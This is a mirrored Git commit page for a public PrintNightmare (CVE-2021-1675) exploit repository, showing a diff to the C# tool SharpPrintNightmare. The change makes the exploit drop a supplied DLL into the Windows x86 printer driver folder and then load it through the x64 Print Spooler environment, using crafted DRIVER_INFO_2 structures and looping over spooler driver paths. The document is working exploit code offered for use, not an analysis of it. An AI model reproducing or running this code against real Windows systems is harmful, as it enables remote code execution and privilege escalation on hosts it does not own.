r3pek/CVE-2021-1675
1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2025-05-09 20:23:32 +01:00
Code Releases Activity

Drop file to x86 folder then load with x64

Browse source
This commit is contained in:
testanull 2021-07-03 14:56:09 +07:00
parent c6bb4923d8
commit 2caad3a1bc
1 changed files with 14 additions and 6 deletions
Download patch file Download diff file Expand all files Collapse all files

20
SharpPrintNightmare/SharpPrintNightmare/Program.cs
View file

@ -117,16 +117,20 @@ namespace SharpPrintNightmare
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
string pDriverPathX86 = pDriverPath.Replace("ntprint.inf_amd64", "ntprint.inf_x86");
pDriverPathX86 = pDriverPathX86.Replace("Amd64", "I386");
Console.WriteLine($"[*] pDriverPath {pDriverPath}"); Console.WriteLine($"[*] pDriverPath {pDriverPath}");
Console.WriteLine($"[*] pDriverPathX86 {pDriverPathX86}");
Console.WriteLine($"[*] Executing {dllpath}"); Console.WriteLine($"[*] Executing {dllpath}");
//DRIVER_INFO_2 Level2 = drivers[0]; // debug //First drop to x86 folder
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
Level2.cVersion = 3; Level2.cVersion = 3;
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; Level2.pConfigFile = "C:\\Windows\\SysWOW64\\kernelbase.dll";
Level2.pDataFile = dllpath; Level2.pDataFile = dllpath;
Level2.pDriverPath = pDriverPath; Level2.pDriverPath = pDriverPathX86;
Level2.pEnvironment = "Windows x64"; Level2.pEnvironment = "Windows NT x86";
Level2.pName = "12345"; Level2.pName = "12345";
string filename = Path.GetFileName(dllpath); string filename = Path.GetFileName(dllpath);
@ -143,8 +147,12 @@ namespace SharpPrintNightmare
for (int i = 1; i <= 30; i++) for (int i = 1; i <= 30; i++)
{ {
//add path to our exploit //Then load it
Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}"; Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
Level2.pDriverPath = pDriverPath;
Level2.pEnvironment = "Windows x64";
Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\W32X86\\3\\{filename}";
//convert struct to unmanage code //convert struct to unmanage code
IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2)); IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
Marshal.StructureToPtr(Level2, pnt2, false); Marshal.StructureToPtr(Level2, pnt2, false);